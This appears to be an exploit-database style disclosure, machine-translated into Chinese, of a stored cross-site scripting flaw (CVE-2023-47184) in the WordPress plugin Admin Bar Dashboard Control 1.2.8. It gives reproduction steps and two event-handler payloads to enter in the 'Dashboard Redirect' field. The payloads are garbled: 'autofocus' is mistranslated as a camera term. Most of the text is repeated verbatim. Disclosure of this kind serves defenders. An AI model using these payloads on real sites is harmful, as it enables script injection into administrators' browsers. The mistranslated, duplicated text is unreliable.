#exploit title: WordPress插件管理栏仪表板访问控制版本: 1.2.8-'仪表板重定向'字段存储的跨站点脚本(XSS)
#Google Dork: NA
#日期: 28/10/2023
#利用作者: RACHIT ARORA
#供应商HomePage:
#软件link: https://wordpress.org/plugins/admin-bar-dashboard-control/
#版本: 1.2.8
#类别: Web应用程序
#在: Windows上测试
#CVE : 2023-47184
1。安装WordPress(最新)
2。安装和激活管理栏仪表板访问控制。
3.在仪表板访问下和“仪表板重定向”下导航到“管理栏仪表板”,将有效载荷输入输入字段。
'onfocusin=alert`+自动对焦
'onfocusin=alert`document.domain`+自动对焦
4。您将观察到有效载荷成功存储了,当您在那个时候触发相同功能时,JavaScript有效负载成功执行,我们正在弹出弹出窗口。
#Google Dork: NA
#日期: 28/10/2023
#利用作者: RACHIT ARORA
#供应商HomePage:
#软件link: https://wordpress.org/plugins/admin-bar-dashboard-control/
#版本: 1.2.8
#类别: Web应用程序
#在: Windows上测试
#CVE : 2023-47184
1。安装WordPress(最新)
2。安装和激活管理栏仪表板访问控制。
3.在仪表板访问下和“仪表板重定向”下导航到“管理栏仪表板”,将有效载荷输入输入字段。
'onfocusin=alert`+自动对焦
'onfocusin=alert`document.domain`+自动对焦
4。您将观察到有效载荷成功存储了,当您在那个时候触发相同功能时,JavaScript有效负载成功执行,我们正在弹出弹出窗口。
